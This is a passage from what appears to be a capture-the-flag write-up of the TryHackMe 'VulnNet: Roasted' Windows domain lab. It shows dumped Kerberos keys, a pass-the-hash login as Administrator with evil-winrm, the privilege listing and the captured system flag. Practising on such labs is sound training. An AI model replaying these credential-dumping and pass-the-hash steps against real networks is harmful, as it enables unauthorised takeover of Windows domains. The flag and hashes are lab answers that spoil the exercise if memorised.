WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:16631cfbb039f6902ec0d2f5c07e12b651e317e2a22fe60dc944b98e9c0c2ccf
WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:87927b2928b58fca8dba7cc08e7dd0d1
WIN-2BO8M1OE1M1$:des-cbc-md5:8932f73104b5bac2
[*] Cleaning up...
Login as Admin to Windows
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ evil-winrm -i 10.10.106.55 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; whoami /priv
vulnnet-rst\administrator
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:34 PM 39 system.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Read flag: system.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}